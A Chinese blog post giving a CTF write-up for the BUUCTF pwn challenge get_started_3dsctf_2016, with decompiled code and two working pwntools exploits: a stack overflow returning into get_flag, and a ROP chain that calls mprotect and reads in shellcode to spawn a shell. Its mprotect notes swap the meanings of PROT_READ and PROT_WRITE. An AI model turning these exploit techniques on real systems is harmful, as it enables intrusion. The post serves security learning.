get_started_3dsctf_2016【BUUCTF】(两种解法)

已于 2022-08-29 11:14:33 修改
阅读量1.2k 收藏 9
点赞数 3
分类专栏: CTF训练 PWN Linux 文章标签: 安全 PWN linux
于 2022-08-27 19:23:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696518/article/details/126559799
版权
CTF训练 同时被 3 个专栏收录
46 篇文章 14 订阅
订阅专栏
PWN
37 篇文章 3 订阅
订阅专栏
Linux
37 篇文章 0 订阅
订阅专栏

目录

分析

在这里插入图片描述
发现main函数中执行了gets函数,并且还存在一个get_flag函数,则考虑进行栈溢出,方法一

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [esp+4h] [ebp-38h]

  printf("Qual a palavrinha magica? ", v4);
  gets(&v4);
  return 0;
}

void __cdecl get_flag(int a1, int a2)
{
  int v2; // eax
  int v3; // esi
  unsigned __int8 v4; // al
  int v5; // ecx
  unsigned __int8 v6; // al

  if ( a1 == 814536271 && a2 == 425138641 )
  {
    v2 = fopen("flag.txt", "rt");
    v3 = v2;
    v4 = getc(v2);
    if ( v4 != 255 )
    {
      v5 = (char)v4;
      do
      {
        putchar(v5);
        v6 = getc(v3);
        v5 = (char)v6;
      }
      while ( v6 != 255 );
    }
    fclose(v3);
  }
}

方法一

思路很简单,就是通过gets函数溢出执行get_flag函数,并且使得a1,a2的值满足if语句

from pwn import *
# io = process("./get_started_3dsctf_2016")
io = remote("node4.buuoj.cn",26489)
payload = b'a'*56
payload += p32(0x080489A0) + p32(0x0804E6A0) # get_flag_addr:0x080489A0,exit_addr:0x0804E6A0
payload += p32(0x308CD64F) + p32(0x195719D1)
io.sendline(payload)
io.interactive()

tips:最后必须要返回exit,因为本题没有开启标准输入输出,输入输出会在缓冲区呆着,而exit执行后会将缓冲区输出,则可回显flag!!!
但有个小小疑问:本方法大概布局:'a’offset + ‘ebp’ + get_flag + get_flag的返回地址 + 参数1 + 参数2
但为啥溢出了‘ebp’ 地址则失败,我最开始payload为:payload = b’a’(56+4)+p32(0x080489A0) + p32(0x0804E6A0)+p32(0x308CD64F) + p32(0x195719D1),但失败!!

方法二

有些大牛直接通过给bss赋值,使得NX不可执行改成可执行,于是构建shellcode,这里学习一下

mprotect

int mprotect(const void *start, size_t len, int prot);
	第一个参数填的是一个地址,是指需要进行操作的地址。
	第二个参数是地址往后多大的长度。
	第三个参数的是要赋予的权限。
mprotect()函数把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。
prot可以取以下几个值,并且可以用“|”将几个属性合起来使用:
  1)PROT_READ:表示内存段内的内容可写;
  2)PROT_WRITE:表示内存段内的内容可读;
  3)PROT_EXEC:表示内存段中的内容可执行;
  4)PROT_NONE:表示内存段中的内容根本没法访问。

prot=7 是可读可写可执行,记住就行,类似于chmod中的7

需要指出的是,指定的内存区间必须包含整个内存页(4K)。区间开始的地址start必须是一个内存页的起始地址,并且区间长度len必须是页大小的整数倍。
就这样,我们就可以将一段地址弄成可以执行的了。因为程序本身也是静态编译,所以地址是不会变的。

先找一块地址将其变成可执行的

使用:readelf -S get_started_3dsctf_2016查看,可以使用bss地址空间,因为该地址空间存放全局变量,并且属于静态分配的空间。
在这里插入图片描述
由于要求的地址空间为4K的整数倍,因此后三位为000,即bss_addr = 0x80eb000

from pwn import *
io = process("./get_started_3dsctf_2016")
# io = remote("node4.buuoj.cn",26489)
mprotect_addr = 0x806ec80
read_addr = 0x806e140
bss_addr = 0x80eb000
pop3_ret = 0x8063adb
payload = b'a'*0x38+p32(mprotect_addr)+p32(pop3_ret)+p32(bss_addr)+p32(0x1000)+p32(0x7)+p32(read_addr)+p32(pop3_ret)+p32(0)+p32(bss_addr)+p32(0x100)+p32(bss_addr)
io.sendline(payload)
shellcode = asm(shellcraft.sh(),arch='i386',os='linux')
io.sendline(shellcode)
io.interactive()

这里pop3_ret目的是栈平衡,由于mprotect和read都是3个参数,选用三个参数的pop进行栈平衡,这块我不是很懂,得继续学习

Mokapeng
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
LinkIt_for_RTOS_Get_Started_Guide.pdf
06-23
LinkIt_for_RTOS_Get_Started_Guide.pdf
get_started_complete_Windows编程_
10-02
在本文中,我们将深入探讨"get_started_complete"这个主题,特别是关于Windows编程的入门知识。Windows编程是开发针对Microsoft Windows操作系统应用的过程,它涉及到使用特定的API(应用程序接口)和其他工具来创建...
解决file_get_contents无法请求https连接的方法
10-26
3. **使用cURL替代file_get_contents**: 如果您无法修改服务器配置,或者上述方法不适用,您可以选择使用cURL库来代替 `file_get_contents`。cURL是一个强大的URL传输库,支持多种协议,包括HTTPS。下面是一个使用...
PHP file_get_contents设置超时处理方法
10-26
今天说的这篇是讲超时的,确实在跨服务器提交的时候,不可避免的会遇到超时的情况,这个时候怎么办?set_time_limit是没有用的,只有用context中的timeout时间来控制
php 使用file_get_contents读取大文件的方法
10-25
本文介绍了在php中使用file_get_contents函数读取大文件的方法,并附上了示例以及使用小技巧,非常的实用,这里推荐给大家
[Oracle] dbms_metadata.get_ddl 的使用方法总结
09-10
Oracle数据库中的`dbms_metadata.get_ddl`是一个非常实用的包,它允许开发人员和管理员获取数据库对象的创建语句(DDL),这对于备份和恢复、迁移或者理解对象定义非常有帮助。下面我们将深入探讨`dbms_metadata.get...
PHP file_get_contents 函数超时的几种解决方法
10-29
本篇文章将详细介绍如何解决`file_get_contents`函数超时的几种方法。 首先,我们要理解`file_get_contents`函数超时的原理。默认情况下,PHP的超时时间由`max_execution_time`配置项决定,但这仅控制整个脚本执行...
get_block_2.rar_jm86 get_block
09-21
在视频编码领域,"get_block" 是一个关键的术语,它涉及到图像处理和压缩技术。在给定的标题 "get_block_2.rar_jm86 get_block" 中,"jm86" 可能是指某种特定的编码标准或工具,而 "get_block" 则指的是获取图像中的...
PHP中使用file_get_contents post数据代码例子
10-24
主要介绍了PHP中使用file_get_contents post数据代码例子,本文直接给出代码实例,需要的朋友可以参考下
php stream_get_meta_data返回值
10-26
stream_get_meta_data函数主要功能是从封装协议文件指针中取得报头/元数据
CI框架支持$_GET的两种实现方法
10-22
主要介绍了CI框架支持$_GET的两种实现方法,实例分析了get传参方法与pathinfo两种方法的实现技巧,需要的朋友可以参考下
详解WordPress开发中的get_post与get_posts函数使用
10-23
在WordPress开发中,了解和熟练使用`get_post`和`get_posts`这两个函数至关重要。它们是WordPress内置的函数,用于处理和获取文章数据。本文将详细解析这两个函数的用法和特点。 首先,`get_post()`函数通常在开发...
php中get_defined_constants函数用法实例分析
10-24
主要介绍了php中get_defined_constants函数用法,实例分析了get_defined_constants函数的功能、定义及使用技巧,需要的朋友可以参考下
WordPress中函数get_term_link的参数设置问题
09-29
`get_term_link()`接受两个参数:一个是分类ID(term ID),另一个是分类的taxonomy(税务分类)。 例如,如果我们要获取自定义分类ID为8的链接,按照官方文档,我们应该这样写: ```php $term = $custom_term; ...
get_privapp_permissions_V1.0.zip
03-22
get_privapp_permissions_V1.0.zip 当apk需要预置到priv-app目录时,用于检查apk内哪些权限需要添加到 priv-app permissions 权限名单中,否则会导致无法开机
HOOK_get_input.rar_ HOOK_get_input.rar_visual c
07-14
对于中文输入的截获,我们需要关注WH_KEYBOARD_LL(低级键盘Hook)和WH_GETMESSAGE(消息队列Hook)这两种类型。WH_KEYBOARD_LL可以让我们在键盘事件到达目标窗口之前捕获它们,而WH_GETMESSAGE则可以拦截WM_...
PHP使用fopen与file_get_contents读取文件实例分享
10-22
主要介绍了PHP使用fopen与file_get_contents读取文件实例分享的相关资料,需要的朋友可以参考下
2022几款开源的态势感知、攻击监控、日志分析等平台调研
热门推荐
qq_41696518的博客
08-31 1万+
2022几款开源的态势感知、攻击监控、日志分析等平台调研
python 的__get__
最新发布
04-05
在Python中,`__get__`是一个特殊方法,用于定义描述符(descriptor)的获取行为。描述符是一种用于管理属性访问的机制,它可以通过定义`__get__`、`__set__`和`__delete__`方法来控制属性的获取、设置和删除操作。 当一个对象被访问时,如果它是一个描述符对象,并且该对象定义了`__get__`方法,那么Python会调用该方法来获取属性的值。`__get__`方法接受三个参数:`self`、`instance`和`owner`。其中,`self`表示描述符对象自身,`instance`表示访问该属性的实例对象,`owner`表示拥有该属性的类对象。 下面是一个简单的示例,演示了如何使用`__get__`方法定义一个简单的描述符类: ```python class Descriptor: def __get__(self, instance, owner): print("Getting the value") return instance._value class MyClass: def __init__(self, value): self._value = value attr = Descriptor() obj = MyClass(10) print(obj.attr) # 输出:Getting the value 10 ``` 在上面的示例中,`Descriptor`类定义了一个描述符,它的`__get__`方法会打印一条消息并返回实例对象的`_value`属性的值。在`MyClass`类中,我们将`attr`属性设置为一个`Descriptor`对象,当我们访问`obj.attr`时,会调用`Descriptor`对象的`__get__`方法。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值